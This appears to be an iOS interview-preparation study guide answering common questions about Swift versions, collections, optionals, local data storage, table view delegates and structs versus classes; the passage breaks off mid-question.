'HTTP/1.1 500 Internal Server Error' on development machine - removing from collection in session variable - Cannot start .exe from aspx page - Safe to have client-side AND server-side page load event procedures? - Search Window question in VS 2003. - Load-Balanced Web Application Issue - Exporting to Access using ASP.NET - XP SP2 and Microsoft.ApplicationBlocks.ExceptionManagement??? - Send data to other server - Casting to "something that can do a postback" - Add user controls to programmatically specified location - Error: Web Server is not running ASP.NEt Version 1.1 - Docs? Some Classes Require Administrator Role... - how to download a file ?? - DateTime.ToString - whitespace character added to html email - 2 controls in 2 differents opened web pages with same value without refresh - Calendar in a DataGrid column - Passing Value from Webform 2 to Webform1 without refreshing webform1 - BUG? Multiple controls with the same ID - Way to get the browser type and its related version ? - Passing value from one form to another - Storing custom collection in ViewState - vanishing code in InitializeComponent() - obj.dispose - <input type=file , tag. - User management component ? - Global Time Setting - Error when I put code into server control! - Please show me some good resources - how to invoke a postback from javascript - Redirecting back to original page… - VSS tutorial with asp.net - create PDF file in ASP.NET - URGENT:Open Browser from a aspx page - OnMouseOver for a DataGrid control - HTPPModule and GAC problems??? - How to detect when a dynamically added control is clicked - Why do I get an error when I enable my proxy? - UserInteractive Mode - url rewriting - Are my pages getting cached or something? Help very much appreciated! - DirectorySearcher.FindAll() - Pre-compile? - Placeholder and UserControl - Accessing the FORM's POST size - ASP.NET Editable DataGrid - a web form problem! (urgent) - Client-Side TextBox Population From DDL - DA Confusion - A Simple Cookies problem when working with two sites - Control needs roundtrip to "reaffirm" eventhandler? - trying to work with focus on a control - Page_load when I click on a button ?! - DataGrid Header Display Problem - ASP.NET Forms Authentication Problem(s)... - Help needed in Web service - Thanks for the connection string help - Server Application Unavailable - following install of new SQL Server instance - persistant datalayer across http requests? - VS 2005 and web controls - RegularExpressionValidator syntax - Several question : postback, focus - collecting html control IDs on a form - easier way to collect controls on a page? - Open modal dialog - Retrieve value from hidden/disabled DropDownList? - debuging on remote machine - Asynchronous Processing Web age - TextBox postback problem - Output Cache Per User? - New windows - JavaScript ? - Http Headers Errors? - using TreeView-control ??? - Share config between sub web apps - Passport Redirection Problem. - Online custom keyboard - Toolbar button - Design alphabet - Modal form - Reading HTML form post in ASP.Net - DataBinder.Eval Problem ? - do we need to have the "dot" in web.config ? - Application state vs. Cache API - Unable to Run ANY ASP.NET Samples :: REALLY Frustrated! - What is .net - ASP.NET 2.0 Master pages and themes - how to compare current date to a future date and validate it in ASP.NET - Accessing the FORM's POST size - ASP.Net app error message when I try to access the component........ - What's the cultureinfo of aspnet_wp.exe process? - (Free) Rich Text Box web control... - Accessing IE features from embedded WinForms control - Long process -> page can't be displayed - Outlook problem with encoding characters when sending emails in asp.net - Debugging SP - Aspnet worker process recycling - How does Viewstate do it? - how can I access to controls in footertemplate - redirect URL's, return URL's, and URL Parameters - Need help with File Upload Permissions - Datagrid, SQL Adapter question - Code location - Checking too see if client side validation functions will be sent to the browser - Server.Execute reference created objects - passing a string to a regex - Urgent help needed with datatable - please help with ASP.NET access MSDE - I have created ASP.Net application using VB.Net and .Net 1.1 - Calender for ASP.NET with more controle - Identifying Web Development Competence - Problems when the project folder is not under Inetpub\wwwrot - Postback not working - How to disable the HTML code auto-formating in VS.Net? - DataGrid Efficency of setting embeded control properties inline or with codebehind - OnInit / User Controls - Passing Variables between web forms - How can I find out in Page_Load which button event is fired? - How to remove dynamically created controls? - Response.Write alternatives - Connection string Please - Anybody has experience with OWC in C# - Anybody has experience with OWC in C# - Web custom control library - tool recommendation for drawing small pic? - send mail with remote smtp - How to use dynamically added dropdownlist controls? - How can I inherit web user control page? - TreeControl recommendation? - Urgent problem - Stored Procedures using Created. Tables - "Must declare the scalar variable @Nickname"... - Display selected fields in datagrid - Late binding User Controls - Using a class derived from System.Web.UI.Page - HttpContext.Cache.... - Adding Eventhandler for a Button in datagrid... in runtime? - Datagrid imagebutton not responding - http/1.0 403 access denied - . in regular expression - what's the differences between "Overrides Sub OnError" and "Sub Page_Error" ? - Opening a microsoft word document from within an ASP.Net WebForm - string.indexof case insensitive - EnsureChildControls() Simple Question - access to control in footer template - how to dectet if the client had install office word2000 in asp.net - Unable to Load win32.dll - http post to external server - How do I adress a ButtonColumn in ItemCreated? - not redirecting to login page while using forms authentication - Deploying Resource file as content - Deploy Resource File as content - How to make header from 2 rows in the datagrid - get info from datalist - COMException is Raised - using datalist and credit cart - Events not firing - how to change this code to ASP.NET 2 ? - ASP.NET 2 - When? - viewstate on datagrid - Estimate of hours to be spent on a project - Calling an executable from an .aspx page hosted on Windows 2003 - Looking for Web Based Help Desk Solution - **Help! Why is XSL cached in ASP.NET app? - QueryString Question - Error : "SELECT permission denied on object" - Events with dynamically added controls - XSL does not refresh in ASP.NEt unless I rebuild - Response.Write inserting extra - A remote service problem - NullReferenceException on Validate() - mouseover changing bordercolor - MIME type and application - regex: replacing one group of a match - Open page in new window instead of using redirect - How to programatically unbind a web control? - Differentiating postback requests using a web server log analyzer - N-tier and STATIC - apllication wide settings storage - public functions - configuring SQL and connecting to database - Basic DB examples - Creating HTML for A Tag - question about table list in asp.net - WebMatrix - User Control accessing Header information - Session var lost using InProc or StateServer mode - Loop through a reocord set - How to get the returned value from Stored Proc. ? - How does Hotmail login redirect to SSL automatically and then back? - Updating an Access Yes/No field from a datagrid - How does Hotmail login redirect to SSL automatically and then back? - How does Hotmail login redirect to SSL automatically and then back? - Datasets and Inseting Records into DB - Array to a comma Separated String - Blocking mouse right click.... - Is there a way to add httpHandler programmatically instead of web.config - Data View for .xml file: InvalidCastException: Specified cast is not valid - Programmatically requesting an email response receipt. - How to download multiple files - Exception Management - viewstate? - Change table bgcolor programmatically - setting css properties of items - WebMatrix Database problem - Method Not Found Exception in asp.net only - Using Style Sheet with Asp.Net - Regular expression question. - problem with insert into - DataTextField in ButtonColumn - DataGrid: How to clear the contents of a DataGrid - data grid conditional row formatting - boarders on data grid only on data items - Can't get datagrid to Update record using UpdateCommand - New Session Created on Post Back! - error 80070522 - aspnet_wp.exe could not be started after installa - Large Size XML files for data transfer - asp.net & body-tag???? - File Timestamp and Saving Transformed XML to Server - Help in asp.net - Unable to retrieve Crystal report in ASP.NET app - About ASP.NET (v2) Authentication... - List logical disks on remote server - List logical disks on remote server - Diskinformation on remote servers - Copy files over the network - PHP and ASP.NET go HEAD to HEAD - Regional Settings en-GB CultureInfo.CurrentCulture.Name = en-US - input type=file customisation - How to make multi-Row header in the datagrid - different validation areas in aspx page. - Printing HTML - MSAccess problems - Printing HTML - Printing HTML Server Side - Assembly.LoadFrom(...) - Error: No default member found??? - Web Custom Control library - Debug Client Side Script - must be marked as Serializable or have a TypeConverter other than ReferenceConverter to be put in viewstate - Why doesnt this work in Opera ? - How to: Create dataset for development - what is the difference between component and web user control ? - Configuration Managament Application Block and Web.Config Problem - Printing HTML... - Why is this condition true when it should be false ? - Weblog application - User Controls: Did I go Nuts? - Form authorization problem - Debugger - Performance Hit of Debug='true' and No PDB Files - Session Bean (jsp) are there any similar thing in ASP.net - User Controls - help - storing the datatable into the session? - I'm totally stumped - IIS not working on two separate machines - 500 Internal Server Error - Problem with HTA and file download + Your general opinion please. - window.open() in HTTP Response/Request? - Database access crashes - Codebihind not working on live server - FindControl and user controls - Javascript return value - How to get Application State from a class - Form database contents hyperlink - Input string was not in a correct format. on string "0" - Tweek Update Command - firefox questions - asp .net ver 2.0 - Send Data to New Page for Printing ASP.NET - Browser Compatability - Trying to remove "\" from a string - How to make the page expire.... - generating a .js file with asp.net - process.start - XmlSerializer constructor error: can't find ...dll - ASP.NET Httphandler and file names with ampersand = 404 Error. Please help. - Why textbox is persisted when viewstate is off? - Session variable problem - set focus to textbox after click event- tried everything please please help! - Multiple File Uploads - How do you get or save a file from/to a client (button on web page) once they are authenticated? The client could be Mac, Linux or Windows. - Need help with hiding LinkButton in DataList - Strange error binding DataTable to DropDownList: out of range... Parameter name: value - modal dialog and returned results - Unicode - CheckedChanged Event doesn't work? - ItemDataBound issue - Compile Problem - Insert Rows in datagrid - DataGrid Custom Child Control Problem - French format number question - ASP.NET I nternals - Sharing sessions across virtual directories/projects - Access to Container.DataItem From Custom Templated Control within DataGrid Template - Get the path of a virtual subsubfolder - StateServer Sessions problem - Design question... - Changing document.title - list control and default to selected item? - SqlException: Invalid object name 'UserData' - Validation of empty, or range of values in a text box - How do I handle possible (but undesired) HTML in input? - Probelm with embed server controls - printing on network printer - Please Help ??????? - Debug problem... - how can i write in a database - EXECUTE permission denied on object... uh? - Modal dialogs causes loss of Session - SmtpMail.Send - Exception: "Could not access 'CDO.Message' object" - SmtpMail.Send - Exception "Could not access 'CDO.Message' object" - Getting Control ID of buttons in Buttoncolumn in a Datagrid - Setting files/folders permission - Accessing ascx file from windows desktop application - Accessing ascx file from desktop application - How to build ASP.NET projects on a separate build machine? -   not recognised on some browsers -   not recognised on some browsers -   - How to send email Alerts Automatically? - Download file dialogue appears twice using Content-Disposition 'attachment' submitted from a form - Error : "Cannot open database XXX requested by login." - pop email service - server side menu problem3 - Client ID - Variables not initialized - Process security for website - View state limitation - Viewstate of dynamically created controls - server side menu problem - aligning objects - Detect JavaScript Enabled and cokies on SERVER SIDE - Determining Object Passed to a Templated Column - Print via network - Designer error - file failed to load in the form desingner. - Designer error - file failed to load in the form desingner. - Problem in creating a Windows Service - How to configure SQL Server Session State - Tell me the best site to learn ASP.NET - How to handle Error Code Events - problem with ASP.NET Validator Control in 2 Form - how to get asp .net 2.0 - Problem with HTA streaming data to client - viewstate - help! - What if structure is faster? or not?> - how to check whether asp.net is installed/enabled with c#? - Visio 2003 ActiveX control in web page? - Page Load event is called.... - get name of base class from parent - How to avoid back button?
https://bytes.com/sitemap/f-329-p-137.html
CC-MAIN-2019-43
refinedweb
3,283
50.43
Setting Up mod_python This is dealt with more in the installation area here:. Troubleshooting mod_python MD5 Issues It has been reported that mod_python has trouble returning good MD5 strings. It has been speculated that this is because many apache mods are using the same md5 source (php and so forth), but this is not confirmed. It is likely working in most versions of mod_python, but some have had troubles with it. A workaround is to use SHA strings instead of MD5. A ticket has been submitted (ticket:2249) that would allow one to specify SHA or MD5 session keys to avoid this problem in the future, but as of now, you have to manually update django to make this work. Note: This problem is more likely because of Debian mucking up their Python installation. See section 'Python MD5 Hash Module Conflict' of '' on mod_wsgi site. How to do the update - Find your django install, it should live inside the site-packages directory of python. On debian this is /usr/lib/python#.#/site-packages. The #'s are your version number. Other OS's may stick python in different places. - You are going to be modifying django/contrib/sessions/models.py and django/contrib/admin/views/decorators.py. Make backups of those two files. - Find the line at the top of the scripts that imports md5. Add sha so that the line looks something like this: import base64, md5, sha #there may be a bunch more stuff after this - Next, replace all instances of "md5" with "sha" throughout the documents. A search and replace is fine. #For example, the following two lines which originally looked like this: pickled_md5 = md5.new(pickled + settings.SECRET_KEY).hexdigest() return base64.encodestring(pickled + pickled_md5) #would now look like this: pickled_sha = sha.new(pickled + settings.SECRET_KEY).hexdigest() return base64.encodestring(pickled + pickled_sha) - SHA strings are 40 characters, not 32, we need to fix the string splitting: #Find the lines that look like this: pickled, tamper_check = encoded_data[:-32], encoded_data[-32:] #And change them to this: pickled, tamper_check = encoded_data[:-40], encoded_data[-40:] - Done. That's all there is to it. Restart apache after saving the files and try to go to your admin area. If you have any additional problems, please head over to the irc channel. Plesk Issues: Django not being called by Apache on a subdomain Symptom Loading the page in a browser shows nothing but the contents of your httpdocs directory (ie: no output from your django project appears). Probable cause Apache is not reading your vhost.conf file containing the django handler. Solution On a plesk administered system, the conf settings for django to work on a subdomain need to be entered into the vhost.conf file, often located at something like /var/www/vhosts/<yourdomain>/subdomains/<subdomain>/conf/vhost.conf Open the file, edit it to invoke the django python handler, as described in the Installing Django documentation. VERY IMPORTANT: Once you are done creating the file, you *must* go back to plesk, open your subdomain settings page, and resave the settings. Until you do this, apache will not load your vhost.conf file.
http://code.djangoproject.com/wiki/ModPython
crawl-002
refinedweb
519
65.73
The vgui_event class encapsulates the events handled by the vgui system. More... #include <vgui_event.h> The vgui_event class encapsulates the events handled by the vgui system. For key presses with modifiers the following standards apply: a modifier = vgui_NULL key = 'a' ascii_char = 'a' CTRL+a modifier = vgui_CTRL key = 'a' ascii_char = '^A' SHIFT+a modifier = vgui_SHIFT key = 'a' ascii_char = 'A' We have decided to make it a standard that key is always lower case for simplicity. In particular people have been defining impossible vgui_event_conditions, eg key='A', modifier=NULL (where NULL is the default modifier) and then wondering why SHIFT+a doesn't work. A new data type has been added (ascii_char) which holds the actual key stroke pressed by the user. Definition at line 80 of file vgui_event.h. Constructor - create a default event. Definition at line 84 of file vgui_event.h. Constructor - create an event of the given type. Definition at line 49 of file vgui_event.cxx. Initialise default event. Definition at line 22 of file vgui_event.cxx. Definition at line 73 of file vgui_event.cxx. Definition at line 79 of file vgui_event.cxx. Convert given key to lower case and use that to set key. Convert the given key to lower case and use that to set the key. I added this to avoid the complication of doing this conversion in each GUI impl - kym. Definition at line 59 of file vgui_event.cxx. Definition at line 85 of file vgui_event.cxx. The actual key stroke pressed by the user. Definition at line 105 of file vgui_event.h. Mouse button used (if it is a mouse event). Definition at line 93 of file vgui_event.h. Definition at line 136 of file vgui_event.h. The key pressed in lower case (if it is a key event). Definition at line 96 of file vgui_event.h. Which modifiers are pressed during the event (NULL, CTRL, SHIFT). Definition at line 102 of file vgui_event.h. The adaptor from which the event came. Definition at line 114 of file vgui_event.h. A vcl_string message, for an event of type vgui_STRING. An event of type vgui_STRING implies that this field contains some sort of textual message. The exact encoding of these messages is unspecified; the sender and the receiver may use any protocol they like. Caveat : as a corollary there is no guarantee that one protocol will not clash with another. Definition at line 128 of file vgui_event.h. If the event is a timer event, this holds the ID. For an event of type vgui_TIMER, this field holds the name that was given when the timer request was posted. Definition at line 119 of file vgui_event.h. Timestamp in milliseconds since app started. Definition at line 111 of file vgui_event.h. The type of event (key press, mouse motion, etc). Definition at line 90 of file vgui_event.h. Type and data for events of type vgui_OTHER. The fields user and data are used only when the event type is vgui_OTHER. The 'user' field must uniquely identify the type of event, in the sense that once the user field is known, the 'data' field can be safely cast to point to the client data (type). Definition at line 135 of file vgui_event.h. Position of the mouse pointer in viewport coordinates when event occurred. Definition at line 108 of file vgui_event.h. Definition at line 108 of file vgui_event.h.
http://public.kitware.com/vxl/doc/release/core/vgui/html/classvgui__event.html
crawl-003
refinedweb
564
77.33
Table of Contents Python 3 support in GRASS Python versions - keep compatibility with 2.7 (may still work with 2.6, but we don't care) - port to work with 3.5 Python components include: - Python Scripting Library - PyGRASS - Temporal Library - ctypes - wxGUI Python Scripting Library What to consider: - The API is used not only by the GRASS Development Team (core devs) but in general, e.g. by writing addons or custom user scripts. - Maybe the core devs can be convinced to follow certain special practices for the core modules, but it doesn't seem realistic that addon contributors will follow them if there are too distant from what is standard for the language (less serious example is requiring PEP8 conventions versus some custom ones). - The purpose of the API is to make it simple for people to use and extend GRASS GIS. - Trained (and even the non-trained) Python 3 programmers will expect API to behave in the same way as the standard library and language in general. - One writes os.environ['PATH'], not os.environ[b'PATH']nor os.environ[u'PATH']. - GUI needs Unicode at the end. Possible approach: - functions need to accept unicode and return unicode - functions wrapping Python Popen class (read_command, run_command, ...) will have parameter encoding - encoding=None means expects and returns bytes (the current state) - encoding='default' means it takes current encoding using utils._get_encoding() - encoding='utf-8' takes whatever encoding user specifies, e.g., utf-8 in this case - this is similar to Popen class in Python3.6 - by default encoding='default' to enable expected behavior by users, the following example shows Python3 behavior if we keep using bytes instead of unicode: # return bytes ret = read_command('r.what', encoding=None, ... for item in ret.splitlines(): line = item.split('|')[3:] Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: a bytes-like object is required, not 'str' # we would have to use: for item in ret.splitlines(): line = item.split(b'|')[3:] Unicode as the default type in the API, e.g. for keys, but also for many values, is supported by Unicode being the default string literal type in Python 3. API users will expect that expressions such as hypothetical computation_region['north'] will work. Unlike in Python 2, there is a difference in Python 3 between computation_region[u'north'] and computation_region[b'north']. See comparison of dictionary behavior in 2 and 3: # Python 2 >>> d = {'a': 1, b'b': 2} >>> d['b'] 2 >>> d[u'b'] 2 >>> # i.e. no difference between u'' and b'' keys >>> and that applies for creating also: >>> d = {u'a': 1, b'a': 2} >>> d['a'] 2 >>> # because >>> d {u'a': 2} # Python 3 >>> # unlike in 2, we get now two entries: >>> d = {'a': 1, b'a': 2} >>> d {b'a': 2, 'a': 1} >>> d['a'] 1 >>> d[b'a'] 2 >>> # it becomes little confusing when we combine unicode and byte keys >>> d = {'a': 1, b'b': 2} >>> d['a'] 1 >>> d['b'] Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 'b' >>> d[b'b'] 2 >>> # in other words, user needs to know and specify the key as bytes Python 2 and Python 3 differences The most important change between these two versions is dealing with strings. - In Python 2: - Bytes == Strings - Unicodes != Strings - In Python 3: - Bytes != Strings - Unicodes == Strings When special characters are involved: For Python 3, bytes objects can not contain character literals other than ASCII, therefore, we use bytes() to convert from unicode/string to byte object. >>> bytes('Příšerný kůň', encoding='utf-8') b'P\xc5\x99\xc3\xad\xc5\xa1ern\xc3\xbd k\xc5\xaf\xc5\x88' To decode, use decode(): >>>b'P\xc5\x99\xc3\xad\xc5\xa1ern\xc3\xbd k\xc5\xaf\xc5\x88'.decode() 'Příšerný kůň' We already have encode and decode functions available in (from grass.script.utils import encode, decode) lib/python/script/utils.py that makes it easy for us to convert back and forth. To make it work with Python3, made changes in those functions to avoid syntax errors and exceptions. Dictionary Differences How to write Python 3 compatible code To check which Python version is being used, use sys.verson_info like: import sys if sys.version_info.major >= 3: //… else: //... Other recommendations: Use .format specifier for the strings and parameters. For example instead of using: '%s %s' % ('one', 'two') Use: '{} {}'.format('one', 'two') .format is compatible with both Python 2 and Python 3. Read more at: wxPython GUI There are a lot of changes found in wxPython Phoenix version. It is recommended to follow the MIgration guide () to properly migrate from the Classic version of wxPython. To support both the versions. The wrap.py includes a lot of new classes that work as a wrapper to accommodate both the versions of wxPython and Python itself. All the changes for Classic vs Phoenix can be found here: We have created a wrap.py class that contains overloaded classes for wx classes to support both versions. Example: from gui_core.wrap TextCtrl, StaticText Deprecated warnings can be removed by appropriately using the wx classes. Refer to the changes in both versions and see if the wrapper class is already created for the wx class; if not, create a new class in a similar manner as other wrapper classes in the wrap.py file. cmp function is not available in Python3, it has been custom created and included in gui/wxpython/core/utils.py file. Be sure to include it where cmp() is used. How to test This section explains how to compile GRASS GIS (trunk) with Python3 support and how to run it. Linux We can rather easily create an isolated environment with Python3 using virtualenv which lets you test GRASS GIS with Python3 support while not cluttering your standard system. Installation of virtualenv-3: # on Fedora sudo dnf install python3-virtualenv # on Debian/Ubuntu sudo apt install python3-virtualenv Preparation of the virtual Python3 environment. There are two options, build wx package on your own (it takes time like 30+min and some GB to build!) or simply use system-wide packages: # USE DISTRO PROVIDED PACKAGES # 3a) on Fedora sudo dnf install python3-six python3-numpy python3-wxpython4 # 3a) on Debian/Ubuntu system sudo apt install python3-six python3-numpy python3-wx # OR BUILD WX PACKAGE DEPENDENCIES # 3b) on Fedora (not recommended) # sudo dnf install python3-six gtk3-devel gstreamer-devel gstreamer-plugins-base-devel python3-sip python3-sip-devel webkit2gtk3-devel # 3b) on Debian/Ubuntu (untested) sudo apt install libgtk-3-dev libgstreamer-plugins-base0.10-dev Create the virtual environment: # FOR CURRENT USER ONLY # 4a) on Fedora virtualenv-3 -p python3 grasspy3 # 4a) on Debian/Ubuntu virtualenv -p python3 grasspy3 # OR AS SYSTEM-SIDE VIRTUALENV # 4b) on Fedora virtualenv-3 -p python3 grasspy3 --system-site-packages # 4b) on Debian/Ubuntu virtualenv -p python3 grasspy3 --system-site-packages Activating the virtual Python3 environment for testing: # activate it (this will change the terminal prompt so that you know where you are...) source grasspy3/bin/activate and build within this environment 'wx' package (NOTE: only needed if 3b) above was used!) # run within virtualenv # install required Python3 packages for GRASS GIS (it takes time like 30min and some GB to build! not recommended) pip install six pip install wxpython pip install numpy # if desired, also GDAL (not recommended) pip install --global-option=build_ext --global-option="-I/usr/include/gdal" GDAL==`gdal-config --version` We are now settled with the dependencies. Compile GRASS GIS with Python3: # cd where/the/source/is/ configure... make make install Test GRASS GIS with Python3: # just run it in the virtualenv-3 session grass77 --gui In order to deactivate the virtualenv-3 environment, run deactivate Windows To test a winGRASS compilation with python3 support, install the dependencies according the windows native compilation guidelines. in MSYS2/mingw environment cd /usr/src virtualenv --system-site-packages --no-pip --no-wheel --no-setuptools grasspy3 Using base prefix 'C:/msys64/mingw64' New python executable in C:/msys64/usr/src/grasspy3/Scripts/python3.exe Also creating executable in C:/msys64/usr/src/grasspy3/Scripts/python.exe change into the grasspy3 directory and do a svn checkout cd grasspy3 svn checkout grass_trunk activate the virtual environment $ source Scripts/activate (grasspy3) change into the grass_trunk directory and start the compilation cd grass_trunk # for daily builds on 64bit PACKAGE_POSTFIX=-daily OSGEO4W_POSTFIX=64 ./mswindows/osgeo4w/package.sh Troubleshooting Problem: File "/<grassbin_path>/etc/python/grass/lib/vector.py", line 5860 PORT_LONG_MAX = 2147483647L ^ SyntaxError: invalid syntax Solution: make sure to compile GRASS GIS with Python 3 (the error occurs when GRASS GIS was compiled with Python2 and then opened with Python 3). References
http://trac.osgeo.org/grass/wiki/Python3Support
CC-MAIN-2019-04
refinedweb
1,444
52.9
About Latest trend Latest version of iOS, Swift, XCode Answer: As per today (22-March-2020), Latest version of XCode : 11.3 Swift : 5.2 iOS : 13.1 Mac OS : Catlina 10.15 1. What’s new in Swift 5? Answer: 1. isMultiple(of: 2) var row = 20 if row % 2 == 0{ print("Even number") } //in swift 5 if row.isMultiple(of: 2) { print("Even number") } 2. Creation of raw string As of Swift 5, it is possible to create raw strings. This makes it possible to express string literals as they are. Raw strings are created using the # before and after the String value. var myName = #"Hello! My Name is "Sandesh Sardar" "# 2. What is new in iOS version and what’s new in it from previous version Answer: Two big new features for iOS 13 are Dark Mode (previous its with system app but now can integrate with third party apps) and Sign In with Apple (just like facebook and google). Diffabledatasource – no need to write datasource in tabelview and collectionview iOS Coding Concepts 1. What is array? How it create and diff operation on it? Answer : An array is an ordered collection that stores multiple values of the same type. That means that an array of Int can only store Int values. And you can only insert Int values in it. //how to create let names = ["Arthur", "Ford", "Trillian", "Zaphod", "Marvin"] Empty array -> let score = [Int]() //how to add element in array names.append("Eddie") names += ["Heart of Gold"] //how to remove names.remove(at: 2) //how to insert at particular position names.insert("Humma Kavula", at: 4) 3. What is Dictionary? How it create and diff operation on it? Answer : A dictionary is an unordered collection that stores multiple values of the same type. Each value from the dictionary is associated with a unique key. All the keys have the same type. //how to declare var dictionary: [String:Int] = [ "one" : 1, "two" : 2, "three" : 3 ] var emptyDictionary: [Int:Int] = [:] stringsAsInts["zero"] // Optional(0) // getting value //how to loop for (key, value) in userInfo { print("\(key): \(value)") } stringsAsInts["three"] = 3 // update stringsAsInts.updateValue(3, forKey: "three") // You can use the updateValue(forKey:) to update stringsAsInts.removeValueForKey("three") // removeValueForKey() 4. What is set? Answer :.) Declaring a set with duplicate values let someStrSet:Set = ["ab","bc","cd","de","ab"] print(someStrSet) When you run the program, the output will be: ["de", "ab", "cd", "bc"] 5. What is the first thing called when iOS application start Answer : in main.m file (main function) But for practical purposes I think you usually need to implement some of the UIApplicationDelegate’s methods, depending on situation: If an app starts up it’s: - (BOOL)application:(UIApplication *)application willFinishLaunchingWithOptions : if A View starts up, then it’s: - (void)viewDidLoad {} 6. What is the difference between var and let? Answer: var is a variable that can be changed (mutable) while let denotes a constant that cannot be changed once set (immutable). 7. What is the difference between implicit and explicit? Answer: When referring to something as implicit or explicit, it is often referring to how an object is declared. In the two examples below: var name: String = "onthecodepath" // explicit var name = "onthecodepath" // implicit (Swift is able to infer that name is of a String type since the value that it is being set as is of a String type.) 8. What is the question mark (optional) ? in Swift? Answer:!)”) } 9. Type of optional unwrapping in swift? Answer: 1. Optional binding 2. Force unwrapping 3. guard (early exit) 10. What is Optional binding in swift? Answer: Use optional binding to find out whether an optional contains a value, and if so, to make that value available as a temporary constant or variable. An optional binding for the if statement is as follows − var myString:String? myString = "Hello, Swift 4!" if let yourString = myString { print("Your string has - \(yourString)") } else { print("Your string does not have a value") } When we run the above program using playground, we get the following result − Your string has - Hello, Swift 4! 11. What is the force unwrapping it Swift? Answer: This is where we are sure an optional has a value. If for some reason we force unwrap an optional that does not, in fact, have a value then this will result in a program crash. 12. What is implicit optional? Answer: Sometimes we do not provide an initial value for our variable but it is clear from our program’s structure that the variable will have a value. In this case, there is no need to make the variable optional. Instead we make it implicit optional. Implicit optionals are in fact optionals behind the scenes but when they get a value this is unwrapped automatically and the variable does not need to be treated as an optional. If no value exists when we attempt to access an implicit optional this will result in a program crash. var myName: String! myName = "Sandesh" let fullName = myName + "Sardar" print(fullName) 13. What is the use of exclamation mark !? Answer: Highly related to the previous keywords, the ! is used to tell the compiler that I know definitely, this variable/constant contains a value and please use it (i.e. please unwrap the optional). 14. Optional chaining Answer: The process of querying, calling properties, subscripts and methods on an optional that may be ‘nil’ is defined as optional chaining. Optional chaining return two values − - if the optional contains a ‘value’ then calling its related property, methods and subscripts returns values - if the optional contains a ‘nil’ value all its its related property, methods and subscripts returns nil Since multiple queries to methods, properties and subscripts are grouped together failure to one chain will affect the entire chain and results in ‘nil’ value. Program for Optional Chaining with ‘!’ class ElectionPoll { var candidate: Pollbooth? } class Pollbooth { var name = "MP" } let cand = ElectionPoll() let candname = cand.candidate!.name When we run the above program using playground, we get the following result − fatal error: unexpectedly found nil while unwrapping an Optional value Program for Optional Chaining with ‘?’ class ElectionPoll { var candidate: Pollbooth? } class Pollbooth { var name = "MP" } let cand = ElectionPoll() if let candname = cand.candidate?.name { print("Candidate name is \(candname)") } else { print("Candidate name cannot be retreived") } When we run the above program using playground, we get the following result − Candidate name cannot be retreived 15. How to store data locally? Answer: - SQLite - Property List - Core Data - NSUser Defaults - Key Chain SQLite For iOS Local Data Storage SQLite is a powerful lightweight C library that is embedded in an iOS application. This is used in various applications across various platforms including Android and iOS. It uses SQL-centric API to operate the data tables directly. Property List, Documents in property list contain either an NSDictionary or an NSArray, inside which there is archived data. There are number of classes that can be archived into the Plist, eg. NSArray, NSDate, NSString, NSDictionary. Objects other than these cannot be archived as a property list and will not be able to write the file. user has to be very particular about listing items into the classes, for instance to store a Boolean or Integer object only NSNumber class is used. Boolean or Integer object must not be given to any objects in NSDictionary or NSArray. Core Data By default, core data uses SQLite as its main database in the iOS app. Internally Core Data make use of SQLite queries to save and store its data locally, which is why all the files are stored as .db files. This also eliminates the need to install a separate database. Core Data allows you deal with common functionalities of an app like, restore, store, undo and redo. Core data is a data modelling framework built on the model-view-controller(MVC) pattern. It is expressed in terms of entities and relationships. We can create entities and add relationships in the graphical form. NSUserDefaults : To save properties in any application and user preferences, NSUserDefaults is one of the most common methods for local data storage. for ex. this is used to save logged in state of the user within an application, so that the app can fetch this data even when user access the application at some other time. In some of the iOS apps this method is used to save user’s confidential information like access token. NSUserDefault is used to store small amounts of data. It can slows down app if large data is store. Also UserDefaults is not encrypted. Key Chain : It can be used to save passwords, secure notes, certificates, etc. In general, Keychain is an encrypted database with quite a complicated and robust API. Use to reduce the vulnerabilities of iOS applications, by storing local data in a secure manner. If the device is jail broken, none of your data is secure. This is the most secure and reliable method to store data on a non-jailbroken device. Simple wrapper classes are used to store data using key chain method. The code for saving data is similar to the code for saving data in NUserDefaults and the syntax used is very similar to that of NUserDefaults. However, data storage using the keychain is not possible for a jailbroken device, where the attacker can access everything from PList files, key chain and other method implementations. Saving Files to Disk Apple makes writing, reading, and editing files inside the iOS applications very easy. Every application has a sandbox directory (called Document directory) where you can store your files. FileManager object provides all these functionalities with very simple APIs. Diff. Between SQLite and Core data? Core Data: - Not a database, its a framework for managing object graph (collection of interconnected objects) - It uses SQLite for its persistent store. - Framework excels at managing complex object graphs and its life cycles. - Core Data is an ORM (Object Relational Model) which creates a layer between the database and the UI SQLite: - Relational database - Lightweight DB and stored on disk - SQLite does not require a separate server process or system to operate. 16. What is delegate and datasource Answer: A delegate is an object that acts on behalf of, or in coordination with, another object when that object encounters an event in a program. The delegating object typically keeps a reference to the other object (delegate) and sends a message to it at the appropriate time. It is important to note that they have a one to one relationship. A datasource is like a delegate except that, instead of being delegated control of the user interface, it is delegated control of data TabelView delegate and datasource methods Datasource : UITableViewDataSource protocol deal with providing data for the tableview. The required functions that need to be implemented are - tableView:cellForRowAtIndexPath: - tableView:numberOfRowsInSection: Delegate : heightForFooterInSection heightForRowAt viewForFooterInSection CollectionView delegate and datasource methods Datasource: numberOfItemsInSection cellForItemAt indexPath: IndexPath Delegate: didSelectItemAt indexpath A flow layout works with the collection view’s delegate object to determine the size of items, headers, and footers in each section and grid. That delegate object must conform to the UICollectionViewDelegateFlowLayout protocol. Use of the delegate allows you to adjust layout information dynamically. 17. Struct vs Class in Swift Answer: Classes and structures are general-purpose, flexible constructs that become the building blocks of your program’s code. You define properties and methods to add functionality to your classes and structures by using exactly the same syntax as for constants, variables, and functions. Value Type: Struct , Enum, String, Array , Dictionary Reference Type: Class, NSString, NSArray - When you pass a class object around your program, you are actually passing a reference to that object, so different parts of your program can share and modify your object. When you pass a structure [ or enum] around your program, what gets passes around is a copy of the structure. So modifications to structures don’t get shared. - Inheritance enables one class to inherit the characteristics of another. Struct or enum cannot do inheritance. But they can confirm to protocols. (Inheritance is not allowed in Struct but creating protocol is allowed) 2. final keyword in class makes class final and do allow any other class to inherit from it 3. override function used to override parent class function in child class. 4. inheritance is not available in struct 5. classes never come with a memberwise initializer. This means if you have properties in your class, you must always create your own initializer. 6. difference between classes and structs is that classes can have deinitializers – code that gets run when an instance of a class is destroyed. 7.The final difference between classes and structs is the way they deal with constants. If you have a constant struct with a variable property, that property can’t be changed because the struct itself is constant. 18. What is the purpose of 